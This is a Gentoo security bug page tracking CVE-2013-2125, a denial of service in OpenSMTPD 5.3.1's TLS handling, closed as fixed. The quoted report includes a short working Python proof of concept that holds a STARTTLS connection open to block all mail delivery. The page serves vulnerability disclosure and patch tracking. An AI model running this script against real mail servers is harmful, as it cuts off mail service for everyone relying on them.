Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 470610 (CVE-2013-2125) - mail-mta/opensmtpd: Denial of Service in the TLS support (CVE-2013-2125)
Summary: mail-mta/opensmtpd: Denial of Service in the TLS support (CVE-2013-2125)
Status: RESOLVED FIXED
Alias: CVE-2013-2125
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL: http://www.openwall.com/lists/oss-sec...
Whiteboard: B3 [glsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2013-05-19 08:31 UTC by Agostino Sarubbo
Modified: 2014-09-10 01:11 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2013-05-19 08:31:39 UTC 
From ${URL} :

The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its
sockets in blocking mode, allowing an attacker to prevent all mail
delivery simply by holding a socket open.

I discovered this accidentally, as I noticed my HP printer's smtp
client would keep the connection indefinitely open after an
unsuccessful authentication attempt, causing no more mail to be
delivered until I SIGKILL'd my smtpd process or unplugged my printer.

The following reproduces the attack trivially:

    #!/usr/bin/env python2
    import smtplib
    import time
    print "[+] Connecting to server and initiating TLS"
    smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
    smtp.starttls()
    print "[+] No clients will be able to connect as long as this remains open."
    time.sleep(100000000)

Apparently this was fixed recently upstream, noting "evil client" in
the commit message:
http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0

A snapshot has been posted to http://www.opensmtpd.org/archives/ , but
no patch release has yet been made.


@maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not.
Comment 1 GLSAMaker/CVETool Bot gentoo-dev 2014-08-19 22:56:38 UTC 
CVE-2013-2125 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2125):
  OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which allows
  remote attackers to cause a denial of service (connection blocking) by
  keeping a connection open.
Comment 2 Yury German Gentoo Infrastructure gentoo-dev 2014-09-10 01:11:53 UTC 
As per the opensmtpd page this looks to be fixed in version:

OpenSMTPD 5.3.1 Security Advisories

These are the OpenSMTPD 5.3.1 advisories -- all these problems are solved in our repository as well as in newer snapshots and releases.

May 16, 2013: OpenSMTPD's SSL layer has a bug in the IO events handler which can cause an evil client or server to hang all active SSL sessions until they timeout, causing a DoS in smtp and transfer processes.

https://www.opensmtpd.org/security.html

Closing the bug as resolved as we do not have earlier versions in tree other then 5.4.1. If I am mistaken please advise and we will address.

Adding to master GLSA for 2013.